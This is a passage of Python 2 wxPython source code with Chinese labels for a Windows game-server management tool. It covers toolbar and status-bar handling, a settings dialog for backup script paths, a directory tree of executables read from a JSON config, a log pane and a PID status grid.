e):\n BtmStatusBar = self.parent.GetStatusBar()\n if self.Status.IsChecked():\n StatusBar(self.parent)\n curPath = self.FindWindowById(ID_MidWindow, self.parent).PageOne.LeftPanel.GetPath()\n self.parent.SetStatusText(curPath, 0)\n else:\n BtmStatusBar.Destroy()\n if e:\n e.Skip()\n\n\n# TODO: 工具栏\nclass ToolBar(wx.ToolBar):\n def __init__(self, parent=None, id=ID_ToolBar):\n super(ToolBar, self).__init__(parent=parent, id=id, style=wx.TB_NODIVIDER | wx.TB_FLAT, name=u'工具栏')\n self.root = parent\n if self.root:\n self.setItems()\n self.Realize()\n self.root.SetToolBar(self)\n # self.Bind(wx.EVT_TOOL, self.ToggleBitmap)\n\n def setItems(self):\n self.AddTool(ID_Start, 'start', GetBitmap(B64_START24), u'开服').SetClientData(True)\n self.AddTool(ID_Pause, 'pause', GetBitmap(B64_PAUSE24), u'暂停').SetClientData(True)\n self.AddTool(ID_Close, 'close', GetBitmap(B64_CLOSE24), u'关服').SetClientData(True)\n self.AddTool(wx.ID_REFRESH, 'refresh', GetBitmap(B64_REFRESH24), u'刷新').SetClientData(True)\n self.AddStretchableSpace()\n self.AddTool(ID_REDIS, 'redis', GetBitmap(B64_REDIS24), u'Redis').SetClientData(True)\n self.AddTool(ID_MONGO, 'mongo', GetBitmap(B64_MONGO24), u'Mongo').SetClientData(True)\n # self.FindById(ID_REDIS).GetPosition()\n # self.InsertSeparator(pos=4)\n self.EnableTool(ID_Start, False)\n self.EnableTool(ID_Pause, False)\n self.EnableTool(ID_Close, False)\n\n def ToggleBitmap(self, curId):\n # curId = e.GetId()\n curItem = self.FindById(curId)\n\n preHelp = curItem.GetShortHelp()\n preData = curItem.GetClientData()\n # print('preData=', preData)\n self.root.SetStatusText(preHelp, 2)\n\n if curId != ID_Pause:\n if curId == ID_Start:\n self.EnableTool(ID_Close, not preData)\n if curId == ID_Close:\n self.EnableTool(ID_Start, not preData)\n if not preData:\n self.SetPauseToolStyle(preData)\n self.EnableTool(ID_Pause, preData)\n self.SetStartToolStyle(preData)\n self.SetCloseToolStyle(preData)\n else:\n self.SetPauseToolStyle(preData)\n\n self.Realize()\n\n def SetStartToolStyle(self, flag=True):\n if not self.GetToolEnabled(ID_Start):\n return\n bitmap = B64_STOP24 if flag else B64_START24\n help = u\"停止\" if flag else u\"开服\"\n\n self.SetToolNormalBitmap(ID_Start, GetBitmap(bitmap))\n self.SetToolShortHelp(ID_Start, help)\n self.SetToolClientData(ID_Start, not flag)\n\n def SetPauseToolStyle(self, flag=True):\n if not self.GetToolEnabled(ID_Pause):\n return\n bitmap = B64_GOON24 if flag else B64_PAUSE24\n help = u\"继续\" if flag else u\"暂停\"\n\n self.SetToolNormalBitmap(ID_Pause, GetBitmap(bitmap))\n self.SetToolShortHelp(ID_Pause, help)\n self.SetToolClientData(ID_Pause, not flag)\n\n def SetCloseToolStyle(self, flag=True):\n if not self.GetToolEnabled(ID_Close):\n return\n bitmap = B64_STOP24 if flag else B64_CLOSE24\n help = u\"停止\" if flag else u\"关服\"\n\n self.SetToolNormalBitmap(ID_Close, GetBitmap(bitmap))\n self.SetToolShortHelp(ID_Close, help)\n self.SetToolClientData(ID_Close, not flag)\n\n\n# TODO: 状态栏\nclass StatusBar(wx.StatusBar):\n def __init__(self, parent=None, id=ID_StatusBar):\n super(StatusBar, self).__init__(parent=parent, id=id, style=65840, name=u'状态栏')\n self.SetFieldsCount(3)\n self.SetStatusWidths([-2, -2, -1])\n self.Show()\n if parent:\n parent.SetStatusBar(self)\n\n\n# TODO: 设置面板\nclass SetBasicDialog(wx.Dialog):\n def __init__(self, parent, title):\n super(SetBasicDialog, self).__init__(parent, title=title, size=(480, 260))\n self.root = parent\n self.initUI()\n self.GetTemplate()\n\n def initUI(self):\n vBox = wx.BoxSizer(wx.VERTICAL)\n gridBox = wx.FlexGridSizer(5, 3, 18, 5)\n\n PrePyLabel = wx.StaticText(self, label=u'环境准备脚本', size=(120, 20))\n self.PrePyText = wx.TextCtrl(self, size=(240, 20), value=PRE_PY_SCRIPT)\n PrePyBTN = wx.Button(self, wx.ID_ANY, label=\"...\", size=(25, 20))\n\n RedisPathLabel = wx.StaticText(self, label=u'Redis备份脚本', size=(120, 20))\n self.RedisPathText = wx.TextCtrl(self, size=(240, 20), value=REDIS_PY_SCRIPT)\n RedisPathBTN = wx.Button(self, wx.ID_ANY, label=\"...\", size=(25, 20))\n\n MongoPathLabel = wx.StaticText(self, label=u'Mongo备份脚本', size=(120, 20))\n self.MongoPathText = wx.TextCtrl(self, size=(240, 20), value=MONGO_PY_SCRIPT)\n MongoPathBTN = wx.Button(self, wx.ID_ANY, label=\"...\", size=(25, 20))\n\n AfterPyLabel = wx.StaticText(self, label=u'环境恢复脚本', size=(120, 20))\n self.AfterPyText = wx.TextCtrl(self, size=(240, 20), value=AFTER_PY_SCRIPT)\n AfterPyBTN = wx.Button(self, wx.ID_ANY, label=\"...\", size=(25, 20))\n\n TimeSleepLabel = wx.StaticText(self, label=u'停顿时间', size=(120, 20))\n self.TimeSleepText = wx.TextCtrl(self, size=(240, 20), value=str(TIME_SLEEP))\n TimeSleepUnit = wx.StaticText(self, label=u'秒', size=(120, 20))\n\n gridBox.Add(PrePyLabel)\n gridBox.Add(self.PrePyText, 1, wx.EXPAND)\n gridBox.Add(PrePyBTN)\n\n gridBox.Add(RedisPathLabel)\n gridBox.Add(self.RedisPathText, 1, wx.EXPAND)\n gridBox.Add(RedisPathBTN)\n\n gridBox.Add(MongoPathLabel)\n gridBox.Add(self.MongoPathText, 1, wx.EXPAND)\n gridBox.Add(MongoPathBTN)\n\n gridBox.Add(AfterPyLabel)\n gridBox.Add(self.AfterPyText, 1, wx.EXPAND)\n gridBox.Add(AfterPyBTN)\n\n gridBox.Add(TimeSleepLabel)\n gridBox.Add(self.TimeSleepText, 1, wx.EXPAND)\n gridBox.Add(TimeSleepUnit)\n\n wx.Button(self, wx.ID_OK, label=u\"确认\", size=(50, 20), pos=(180, 200))\n wx.Button(self, wx.ID_CANCEL, label=u\"取消\", size=(50, 20), pos=(260, 200))\n\n vBox.Add(gridBox, proportion=2, flag=wx.ALL | wx.EXPAND, border=15)\n self.SetSizer(vBox)\n\n self.Bind(wx.EVT_BUTTON, self.SetRrePyPath, PrePyBTN)\n self.Bind(wx.EVT_BUTTON, self.SetRedisPath, RedisPathBTN)\n self.Bind(wx.EVT_BUTTON, self.SetMongoPath, MongoPathBTN)\n self.Bind(wx.EVT_BUTTON, self.SetAfterPyPath, AfterPyBTN)\n\n def GetTemplate(self):\n self.prepareScript = self.PrePyText.GetValue()\n self.redisScript = self.RedisPathText.GetValue()\n self.mongoScript = self.MongoPathText.GetValue()\n self.afterScript = self.AfterPyText.GetValue()\n self.timeSleep = self.TimeSleepText.GetValue()\n\n def SetRrePyPath(self, e):\n newpath = OpenFileDialog(PRE_PY_SCRIPT, PRE_PY_SCRIPT, self)\n self.PrePyText.SetValue(newpath)\n self.GetTemplate()\n if e:\n e.Skip()\n\n def SetRedisPath(self, e):\n newpath = OpenFileDialog(REDIS_PY_SCRIPT, REDIS_PY_SCRIPT, self)\n self.RedisPathText.SetValue(newpath)\n self.GetTemplate()\n if e:\n e.Skip()\n\n def SetMongoPath(self, e):\n newpath = OpenFileDialog(MONGO_PY_SCRIPT, MONGO_PY_SCRIPT, self)\n self.MongoPathText.SetValue(newpath)\n self.GetTemplate()\n if e:\n e.Skip()\n\n def SetAfterPyPath(self, e):\n newpath = OpenFileDialog(AFTER_PY_SCRIPT, AFTER_PY_SCRIPT, self)\n self.AfterPyText.SetValue(newpath)\n self.GetTemplate()\n if e:\n e.Skip()\n\n def SetGlobal(self):\n global PRE_PY_SCRIPT, REDIS_PY_SCRIPT, MONGO_PY_SCRIPT, AFTER_PY_SCRIPT, TIME_SLEEP\n PRE_PY_SCRIPT = self.prepareScript\n REDIS_PY_SCRIPT = self.redisScript\n MONGO_PY_SCRIPT = self.mongoScript\n AFTER_PY_SCRIPT = self.afterScript\n TIME_SLEEP = int(self.TimeSleepText.GetValue())\n\n\n# TODO: 主界面\nclass MidWindow(wx.Notebook):\n def __init__(self, parent=None, id=ID_MidWindow):\n super(MidWindow, self).__init__(parent=parent, id=id, name='Main',\n style=wx.NB_TOP | wx.NB_FIXEDWIDTH | wx.NB_FLAT, size=parent.GetSize())\n self.root = parent\n self.JsonObj = self.root.JsonObj\n # self.taskList = Queue()\n self.NowJob = None\n\n self.PageOne = MainPage(self)\n self.PageTwo = SecondSheet(self)\n\n self.AddPage(self.PageOne, u'主页')\n self.AddPage(self.PageTwo, u'操作日志')\n\n self.PageOneLeft = self.PageOne.LeftPanel\n self.PageOneRight = self.PageOne.RightPanel\n\n self.ToolBar = self.root.GetToolBar()\n self.ToolBar.Bind(wx.EVT_TOOL, self.BindToolEvt)\n self.ToolBar.Bind(wx.EVT_TOOL, self.SaveRedis, id=ID_REDIS)\n self.ToolBar.Bind(wx.EVT_TOOL, self.SaveMongo, id=ID_MONGO)\n self.Bind(wx.EVT_NOTEBOOK_PAGE_CHANGED, self.PageChangeEvt)\n\n def BindToolEvt(self, e):\n BindId = e.GetId()\n # 获取暂停键之前的状态信息\n pauseTool = self.ToolBar.FindById(ID_Pause)\n prePauseBitmap = pauseTool.GetNormalBitmap()\n prePauseShortHelp = pauseTool.GetShortHelp()\n prePauseClientData = pauseTool.GetClientData()\n if BindId in [ID_Start, ID_Close, ID_Pause]:\n self.ToolBar.ToggleBitmap(BindId)\n\n if BindId == ID_Pause:\n if self.NowJob:\n if self.NowJob.isPaused():\n self.NowJob.pause()\n else:\n self.NowJob.restart()\n\n if BindId in [ID_Start, ID_Close]:\n ProcessList = self.GetProcessList()\n preFlag = False if not self.NowJob else self.NowJob.isPaused()\n\n # 任务暂停\n if self.NowJob:\n self.NowJob.pause()\n\n # 取消操作\n if self.root.warnBox() == wx.ID_CANCEL:\n if self.NowJob and preFlag:\n self.NowJob.restart()\n\n self.ToolBar.ToggleBitmap(BindId)\n pauseTool.SetNormalBitmap(prePauseBitmap)\n pauseTool.SetShortHelp(prePauseShortHelp)\n pauseTool.SetClientData(prePauseClientData)\n self.ToolBar.Realize()\n return e.Skip()\n\n if BindId is not ID_Pause:\n if self.NowJob and self.NowJob.isAlive():\n self.NowJob.stop()\n self.NowJob = None\n gc.collect()\n else:\n del self.NowJob\n gc.collect()\n self.PageTwo.AppendInfo(\"选择列表:\\n{0}\".format(\",\".join(ProcessList)))\n self.NowJob = ThreadTask(ProcessList=ProcessList, parent=self, BindId=BindId)\n self.NowJob.start()\n e.Skip()\n\n def PageChangeEvt(self, e):\n wx.CallAfter(self.SetToolBar)\n if e:\n e.Skip()\n\n def SetToolBar(self):\n if (self.GetCurrentPage() == self.PageTwo):\n self.ToolBar.InsertSeparator(4)\n # saveTool = self.ToolBar.CreateTool(wx.ID_SAVE, 'save', GetBitmap(B64_SAVE24), shortHelp=u'保存日志').SetClientData(True)\n # InsertTool(pos, toolId, label, bitmap, bmpDisabled=NullBitmap, kind=ITEM_NORMAL, shortHelp=EmptyString, longHelp=EmptyString, clientData=None) -> ToolBarToolBase\n self.ToolBar.InsertTool(pos=5, toolId=wx.ID_SAVE, label='save', bitmap=GetBitmap(B64_SAVE24),\n shortHelp=u'保存日志', clientData=True)\n self.ToolBar.InsertTool(pos=6, toolId=wx.ID_CLEAR, label='refresh', bitmap=GetBitmap(B64_CLEAR24),\n shortHelp=u'清空日志', clientData=True)\n self.ToolBar.InsertSeparator(7)\n # self.ToolBar.AddTool(wx.ID_CLEAR, 'refresh', GetBitmap(B64_CLEAR24), u'清空日志').SetClientData(True)\n else:\n self.ToolBar.DeleteToolByPos(7)\n self.ToolBar.DeleteToolByPos(4)\n self.ToolBar.RemoveTool(wx.ID_SEPARATOR)\n self.ToolBar.RemoveTool(wx.ID_SAVE)\n self.ToolBar.RemoveTool(wx.ID_CLEAR)\n self.ToolBar.Realize()\n\n def GetProcessList(self):\n return self.PageOneLeft.GetCheckedItems([], self.PageOneLeft.GetSelection())\n\n def GetParameters(self, exe):\n for key in self.JsonObj.keys():\n curJson = self.JsonObj.get(key, {})\n if curJson.has_key(exe):\n return curJson.get(exe, {}).get(\"parameters\", None)\n return []\n\n def SaveRedis(self, e=None):\n if os.path.isfile(REDIS_PY_SCRIPT) and os.path.splitext(REDIS_PY_SCRIPT)[1].lower() == '.py':\n self.root.SetStatusText(REDIS_PY_SCRIPT, 0)\n self.root.SetStatusText(\"正在执行外部脚本...\", 1)\n self.PageTwo.AppendWarn('正在执行外部脚本,{0}'.format(REDIS_PY_SCRIPT))\n os.popen(\"python \" + REDIS_PY_SCRIPT)\n self.root.SetStatusText(\"脚本调用结束\", 1)\n self.PageTwo.AppendInfo('脚本调用结束')\n else:\n self.root.SetStatusText(\"外部redis脚本不存在\", 1)\n self.PageTwo.AppendError('外部准备脚本不存在,{0}'.format(REDIS_PY_SCRIPT))\n if e:\n e.Skip()\n\n def SaveMongo(self, e=None):\n if os.path.isfile(MONGO_PY_SCRIPT) and os.path.splitext(MONGO_PY_SCRIPT)[1].lower() == '.py':\n self.root.SetStatusText(MONGO_PY_SCRIPT, 0)\n self.root.SetStatusText(\"正在执行外部脚本...\", 1)\n self.PageTwo.AppendWarn('正在执行外部脚本,{0}'.format(MONGO_PY_SCRIPT))\n os.popen(\"python \" + MONGO_PY_SCRIPT)\n self.root.SetStatusText(\"脚本调用结束\", 1)\n self.PageTwo.AppendInfo('脚本调用结束')\n else:\n self.root.SetStatusText(\"外部mongo脚本不存在\", 1)\n self.PageTwo.AppendError('外部准备脚本不存在,{0}'.format(MONGO_PY_SCRIPT))\n if e:\n e.Skip()\n\n\n# TODO: 主页\nclass MainPage(wx.SplitterWindow):\n def __init__(self, parent=None):\n super(MainPage, self).__init__(parent=parent, style=wx.SP_NOBORDER, size=parent.GetSize())\n self.parent = parent\n self.root = self.parent.root\n\n self.initUI()\n\n def initUI(self):\n self.RightPanel = PidGrid(self)\n self.LeftPanel = GenerateDirTree(self)\n self.SetMinimumPaneSize(200)\n self.SplitVertically(self.LeftPanel, self.RightPanel, 100)\n\n\n# TODO: 操作日志\nclass SecondSheet(STC.StyledTextCtrl):\n def __init__(self, parent=None):\n self.parent = parent\n self.root = self.parent.root\n self.TextStyle = STC.STC_STYLE_DEFAULT\n\n super(SecondSheet, self).__init__(parent=self.parent, id=-1, style=self.TextStyle)\n\n self.SetMarginWidth(2, 16)\n self.SetMarginType(1, STC.STC_MARGIN_NUMBER)\n\n self.root.GetToolBar().Bind(wx.EVT_TOOL, self.ClearText, id=wx.ID_CLEAR)\n self.root.GetToolBar().Bind(wx.EVT_TOOL, self.SaveToFile, id=wx.ID_SAVE)\n\n def SaveToFile(self, e):\n if not os.path.isdir(os.path.dirname(LOG_FILE_PATH)):\n os.makedirs(os.path.dirname(LOG_FILE_PATH))\n wx.CallAfter(self.SaveFile, filename=LOG_FILE_PATH)\n if e:\n e.Skip()\n\n def ClearText(self, e):\n wx.CallAfter(self.ClearAll)\n if e:\n e.Skip()\n\n def AppendInfo(self, text):\n text = str(time.strftime(\"[%y-%m-%d %H:%M:%S INFO] {0}\\r\\n\".format(text)))\n wx.CallAfter(self.AppendText, text=text)\n self.ScrollLines(1)\n\n def AppendWarn(self, text):\n text = str(time.strftime(\"[%y-%m-%d %H:%M:%S WARN] {0}\\r\\n\".format(text)))\n wx.CallAfter(self.AppendText, text=text)\n self.ScrollLines(1)\n\n def AppendError(self, text):\n text = str(time.strftime(\"[%y-%m-%d %H:%M:%S ERROR] {0}\\r\\n\".format(text)))\n wx.CallAfter(self.AppendText, text=text)\n self.ScrollLines(1)\n\n\n# TODO: 生成主页更新项树形结构\nclass GenerateDirTree(CT.CustomTreeCtrl):\n def __init__(self, parent=None):\n self.parent = parent\n self.root = self.parent.root\n self.RightPanel = self.parent.RightPanel\n self.JsonObj = self.root.JsonObj\n\n agwStyle = CT.TR_DEFAULT_STYLE + CT.TR_AUTO_CHECK_CHILD + CT.TR_AUTO_CHECK_PARENT + CT.TR_HIDE_ROOT\n super(GenerateDirTree, self).__init__(parent=self.parent, agwStyle=agwStyle)\n\n self.SetBackgroundColour(wx.WHITE)\n self.addImageList()\n\n self.itemKeys = sorted(self.JsonObj.keys(), key=lambda key: self.JsonObj[key]['settings']['priority'])\n self.JsonExe = self.SortCheckedItem()\n wx.CallLater(3000, self.CreateTreeCtrl)\n\n self.Bind(CT.EVT_TREE_ITEM_CHECKED, self.BindChecked)\n self.Bind(CT.EVT_TREE_SEL_CHANGED, self.BindChecked)\n self.Bind(CT.EVT_TREE_ITEM_RIGHT_CLICK, self.RightClickEvt)\n # self.Bind(CT.EVT_TREE_BEGIN_DRAG, self.OnDrag, id=self.GetId())\n # self.Bind(CT.EVT_TREE_ITEM_COLLAPSED, self.CollapseAll)\n\n # 右键菜单\n def RightClickEvt(self, e):\n pos = e.GetPoint()\n self.PopupMenu(self.RightMenu(e), pos)\n e.Skip()\n\n # 创建右键菜单\n def RightMenu(self, e):\n subMenu = wx.Menu()\n subMenu.Append(wx.ID_OPEN, \"打开目录(&O)\")\n subMenu.Append(wx.ID_ADD, \"加入选项(&A)\")\n subMenu.Append(wx.ID_DELETE, \"移出选项(&D)\")\n subMenu.Bind(wx.EVT_MENU, self.PopupMenuEvt)\n e.Skip()\n return subMenu\n\n # 右键菜单监听事件\n def PopupMenuEvt(self, e):\n item = self.GetSelection()\n itemData = item.GetData()\n eId = e.GetId()\n if eId == wx.ID_OPEN:\n explorer_select_file(itemData)\n elif eId == wx.ID_ADD:\n self.CheckItem(item, True)\n self.AutoCheckChild(item, True)\n else:\n self.CheckItem(item, False)\n self.AutoCheckChild(item, False)\n e.Skip()\n\n # Json文件中的过滤项\n def GetFilter(self, jsonObj={}):\n filterList = []\n for key in jsonObj.keys():\n curFilter = jsonObj[key].get('filter', \"\")\n filterList.extend(curFilter if type(curFilter) is list else [jsonObj[key].get('filter', \"\")])\n filterList = list(set([exe.lower() for exe in filterList if exe]))\n return filterList\n\n # 添加按钮图片列表\n def addImageList(self):\n self.IconList = wx.ImageList(16, 16)\n self.IconList.Add(wx.ArtProvider.GetBitmap(wx.ART_HARDDISK, wx.ART_OTHER, size=(16, 16)))\n self.IconList.Add(wx.ArtProvider.GetBitmap(wx.ART_FOLDER, wx.ART_OTHER, size=(16, 16)))\n self.IconList.Add(wx.ArtProvider.GetBitmap(wx.ART_NORMAL_FILE, wx.ART_OTHER, size=(16, 16)))\n self.IconList.Add(wx.ArtProvider.GetBitmap(wx.ART_EXECUTABLE_FILE, wx.ART_OTHER, size=(16, 16)))\n self.IconList.Add(wx.ArtProvider.GetBitmap(wx.ART_ERROR, wx.ART_OTHER, size=(16, 16)))\n self.AssignImageList(self.IconList)\n\n # 创建树形结构\n def CreateTreeCtrl(self):\n self.rootNode = self.AddRoot(text=u\"计算机\", data=None, ct_type=0)\n for key in self.itemKeys:\n serverDir = self.JsonObj[key].get(\"settings\", dict()).get(\"rootdir\", None)\n self.ExeList = [exe.lower() for exe in self.JsonObj[key].keys() if exe.lower() != 'settings']\n self.EexFilter = self.GetFilter(self.JsonObj[key])\n if serverDir and os.path.isdir(serverDir):\n dirSplit = os.path.realpath(serverDir).split(os.sep)\n HardDisk = dirSplit[0]\n HardDiskDir = os.path.normpath(HardDisk + os.sep)\n HardDiskText = os.path.normpath(u\"本地磁盘 (%s)\" % HardDisk)\n HardDiskImage = 0\n HardDiskNode = self.FindItemByPath(self.GetRootItem(), HardDiskDir)\n if not HardDiskNode:\n HardDiskNode = self.AppendItem(self.rootNode, text=HardDiskText, data=HardDiskDir,\n image=HardDiskImage,\n ct_type=0)\n self.SelectItem(HardDiskNode)\n HardDiskNode.Check()\n for subdir in dirSplit:\n curDir = os.path.normpath(os.path.join(self.GetPath(), subdir))\n if not os.path.isdir(curDir):\n break\n subNode = self.FindItemByPath(self.GetRootItem(), curDir)\n if not subNode:\n subImage = 1 if os.path.isdir(curDir) else 3 if (\n os.path.isfile(curDir) and os.path.splitext(subdir)[1].lower() == '.exe') else 2\n subNode = self.AppendItem(self.GetSelection(), text=subdir, data=curDir, image=subImage,\n ct_type=1)\n self.SelectItem(subNode)\n subNode.Check()\n self.AddItems(self.GetSelection(), serverDir)\n\n if self.GetSelection() is not self.GetRootItem():\n self.Expand(self.GetSelection())\n self.root.SetStatusText(self.GetSelection().GetData(), 0)\n else:\n self.root.SetStatusText(u\"路径设置错误\", 0)\n self.CollapseAll(self.GetSelection())\n # self.CheckChilds(self.GetRootItem(), True)\n self.EnableTools()\n\n # 树形结构子项添加\n def AddItems(self, rootNode, rootDir):\n if not os.path.isdir(rootDir):\n return\n rootFileList = sorted(os.listdir(rootDir), key=lambda key: os.path.isdir(os.path.join(rootDir, key)),\n reverse=True)\n for itemText in rootFileList:\n subDir = os.path.normpath(os.path.join(rootDir, itemText))\n # 图标格式,对应imaglist\n (preName, fixName) = os.path.splitext(itemText)\n subImage = 1 if os.path.isdir(subDir) else 3 if (\n os.path.isfile(subDir) and preName.lower() in self.ExeList and fixName.lower() == '.exe') else 2\n if subImage == 2:\n continue\n if subImage == 1:\n if int(win32file.GetFileAttributesW(subDir)) == 22:\n continue\n os.chdir(subDir)\n FindExeList = glob.glob('./*/*/*/*.exe') or glob.glob('./*/*/*.exe') or glob.glob(\n './*/*.exe') or glob.glob('./*.exe')\n FindExeList = [os.path.splitext(os.path.basename(exe))[0].lower() for exe in FindExeList if exe]\n if not set(FindExeList).intersection(set(self.ExeList)):\n continue\n os.chdir(scriptDir)\n try:\n subNode = self.AppendItem(rootNode, text=itemText.encode('utf-8'), data=subDir, image=subImage,\n ct_type=1)\n except:\n continue\n if self.RightPanel.GetNumberRows() > 1:\n row, pid = self.RightPanel.FindRowByValue([os.path.normpath(rootDir), itemText], 2)\n if row != -1:\n subNode.Check()\n self.AutoCheckParent(subNode, True)\n else:\n if preName.lower() not in self.EexFilter and rootNode.IsChecked():\n subNode.Check()\n self.AutoCheckParent(subNode, True)\n if os.path.isdir(subDir):\n self.AddItems(subNode, subDir)\n\n # 获得焦点的路径\n def GetPath(self):\n return self.GetSelection().GetData()\n\n # 获得复选框选择项\n def GetCheckedItems(self, checkList=[], item=None):\n item = item or self.GetRootItem()\n itemData = item.GetData()\n if item.IsChecked():\n if itemData and os.path.splitext(itemData)[1].lower() == '.exe':\n checkList.append(item.GetData())\n # yield item.GetData()\n (child, cookie) = self.GetFirstChild(item)\n while child:\n self.GetCheckedItems(checkList, child)\n (child, cookie) = self.GetNextChild(item, cookie)\n return sorted(checkList, key=lambda key: self.JsonExe[os.path.splitext(os.path.basename(key))[0].lower()])\n\n # 根据json配置定义顺序,排序复选框选择项\n def SortCheckedItem(self, checkList=[]):\n for item in self.itemKeys:\n for exe in (sorted(self.JsonObj[item], key=lambda key: self.JsonObj[item][key].get('order', 9999))):\n if exe != 'settings':\n checkList.append(exe)\n return {key.lower(): value for value, key in enumerate(checkList)}\n\n # 展开指定路径\n def ExpandPath(self, path):\n rootItem = self.GetRootItem()\n self.CollapseAll(rootItem)\n item = self.FindItemByPath(rootItem, path)\n if item and item is not self.GetRootItem():\n self.ExpandUpNode(item)\n\n # 展开元素的所有父级元素\n def ExpandUpNode(self, item):\n itemParent = self.GetItemParent(item)\n if itemParent and itemParent is not self.GetRootItem():\n self.Expand(itemParent)\n self.ExpandUpNode(itemParent)\n self.Expand(item)\n self.SelectItem(item, True)\n\n # 收拢元素\n def CollapseAll(self, item=None):\n item = item or self.GetRootItem()\n if (type(item) is wx.lib.agw.customtreectrl.TreeEvent):\n item = item.GetItem()\n if item is not self.GetRootItem():\n item.Collapse()\n (child, cookie) = self.GetFirstChild(item)\n while child:\n child.Collapse()\n self.CollapseAll(child)\n (child, cookie) = self.GetNextChild(item, cookie)\n\n # 通过路径查找元素\n def FindItemByPath(self, parent=None, path=None):\n if not path:\n return False\n (child, cookie) = self.GetFirstChild(parent)\n while child:\n curPath = os.path.normpath(child.GetData()).lower()\n if curPath == os.path.normpath(path).lower():\n return child\n target = self.FindItemByPath(child, path)\n if target:\n return target\n (child, cookie) = self.GetNextChild(parent, cookie)\n return child\n\n # 复选框选择事件监听\n def BindChecked(self, e):\n item = e.GetItem()\n self.SelectItem(item, True)\n self.Expand(item)\n self.root.SetStatusText(item.GetData(), 0)\n self.EnableTools()\n wx.CallAfter(self.SelectGrid, e)\n e.Skip()\n\n # 定位表格\n def SelectGrid(self, e):\n item = e.GetItem()\n itemData = item.GetData()\n findRow, findPid = self.RightPanel.FindRowByValue(list(os.path.split(itemData)), 2)\n if findRow != -1:\n self.RightPanel.SelectRow(int(findRow))\n e.Skip()\n\n # 根据是否存在选择项,设定工具栏按钮状态\n def EnableTools(self):\n toolBar = self.root.GetToolBar()\n hasChecked = True if self.GetCheckedItems([], self.GetSelection()) else False\n\n toolBar.EnableTool(ID_Start, hasChecked)\n toolBar.EnableTool(ID_Pause, False)\n toolBar.EnableTool(ID_Close, hasChecked)\n\n toolBar.Realize()\n\n # 元素拖拽事件\n def OnDrag(self, e):\n item = e.GetItem()\n print(item.GetData())\n e.Skip()\n\n\n# TODO: 进程状态列表\nclass PidGrid(wx.grid.Grid):\n def __init__(self, parent=None, csvFile=\"./ProcessList.csv\"):\n super(PidGrid, self).__init__(parent=parent)\n self.parent = parent\n self.root = self.parent.root\n self.SetRowLabelSize(24)\n self.NowJob = None\n self.NewChange = False\n os.chdir(scriptDir)\n self.csvFile = os.path.normpath(os.path.abspath(csvFile))\n # wx.CallAfter(self.SetRowValueFromCsv)\n wx.CallLater(1000, self.SetRowValueFromCsv)\n\n self.Bind(wx.grid.EVT_GRID_CELL_RIGHT_CLICK, self.RightClickEvt)\n self.root.GetToolBar().Bind(wx.EVT_TOOL, self.RefreshTable, id=wx.ID_REFRESH)\n\n # 右键弹出菜单\n def RightClickEvt(self, e):\n self.SelectRow(e.GetRow())\n pos = e.GetPosition()\n self.PopupMenu(self.RightMenu(e), pos)\n e.Skip()\n\n # 创建右键菜单\n def RightMenu(self, e):\n row = self.GetSelectedRows()[0]\n rValue = list(self.GetRowValue(row))\n enable = True if int(rValue[3]) != -1 else False\n subMenu = wx.Menu()\n subMenu.Append(wx.ID_OPEN, \"打开目录(&O)\")\n subMenu.Append(ID_Switch, \"切换至(&F)\").Enable(enable)\n subMenu.Append(ID_Start, \"启动(&S)\").Enable(not enable)\n subMenu.Append(ID_Close, \"关闭(&C)\").Enable(enable)\n subMenu.Append(wx.ID_REMOVE, \"移除(&D)\")\n subMenu.Bind(wx.EVT_MENU, self.PopupMenuEvt)\n e.Skip()\n return subMenu\n\n # 右键菜单监听事件\n def PopupMenuEvt(self, e):\n eId = e.GetId()\n row = self.GetSelectedRows()[0]\n rValue = list(self.GetRowValue(row))\n if not rValue:\n return e.Skip()\n filePath = os.path.join(rValue[0], rValue[1])\n if eId == wx.ID_OPEN:\n explorer_select_file(filePath)\n elif eId == ID_Switch:\n SystemWindow.SetForegroundByPid(int(rValue[3]))\n elif eId == ID_Start:\n self.ReSetJob()\n self.NowJob = GridThreadTask(row=row, rValue=rValue, parent=self, BindId=eId)\n self.NowJob.start()\n elif eId == ID_Close:\n self.ReSetJob()\n pid = rValue[3]\n if pid != -1:\n self.NowJob = GridThreadTask(row=row, rValue=rValue, parent=self, BindId=eId)\n self.NowJob.start()\n else:\n self.ReSetJob()\n pid = rValue[3]\n if pid != -1:\n self.NowJob = GridThreadTask(row=row, rValue=rValue, parent=self, BindId=ID_Close, rmRow=True)\n self.NowJob.start()\n self.DeleteRows(row, 1)\n self.NewChange = True\n self.SaveToCsv()\n return e.Skip()\n e.Skip()\n\n def ReSetJob(self):\n if self.NowJob and self.NowJob.isAlive():\n self.NowJob.stop()\n del self.NowJob\n gc.collect()\n self.NowJob = None\n\n # 通过单元格值查找行号和pid\n def FindRowByValue(self, RowValueList, colnum=3):\n findRow = -1\n findPid = -1\n for row in range(self.GetNumberRows()):\n rValue = list(self.GetRowValue(row))\n if rValue[0:colnum] == RowValueList[0:colnum]:\n findPid = rValue[3]\n findRow = row\n line = 0 if row < 30 else row\n self.Scroll(0, line)\n # self.ScrollLines(31)\n break\n gc.collect()\n return findRow, findPid\n\n # 设置表格指定行的值\n def SetRowValue(self, row, RowValueList, colour=wx.BLACK, select=True):\n self.NewChange = True\n if select:\n self.SelectRow(row)\n self.SetRowSize(row, 18)\n for col in range(self.GetNumberCols()):\n self.SetCellTextColour(row, col, colour)\n cSize = len(str(RowValueList[col])) * 8\n if cSize > self.GetColSize(col):\n self.SetColSize(col, cSize)\n self.SetCellValue(row, col, str(RowValueList[col]))\n\n # 获取表格指定行的值\n def GetRowValue(self, row):\n for col in range(self.GetNumberCols()):\n yield self.GetCellValue(row=row, col=col).encode('utf-8')\n\n # 获取表头\n def GetRowHeader(self):\n for col in range(self.GetNumberCols()):\n yield self.GetColLabelValue(col).encode('utf-8')\n\n # 设置单元格值\n def AddCellValue(self, RowValueList):\n self.NewChange = True\n findRow, findPid = self.FindRowByValue(RowValueList)\n RowValueList[4] = \"正常\" if psutil.pid_exists(int(RowValueList[3])) and int(\n RowValueList[3]) not in [-1, 0] else \"异常\"\n RowValueList[3] = RowValueList[3] if psutil.pid_exists(int(RowValueList[3])) else -1\n colour = wx.BLACK if int(RowValueList[3]) not in [-1, 0] else wx.RED\n\n if int(findRow) != -1:\n self.SetRowValue(findRow, RowValueList, colour)\n else:\n self.InsertRows(self.GetNumberRows(), 1, True)\n if len(RowValueList) > self.GetNumberCols():\n self.InsertCols(self.GetNumberRows(), len(RowValueList) - self.GetNumberCols(), True)\n self.SetRowValue(self.GetNumberRows() - 1, RowValueList, colour)\n\n # csv文件保存\n def SaveToCsv(self):\n if not 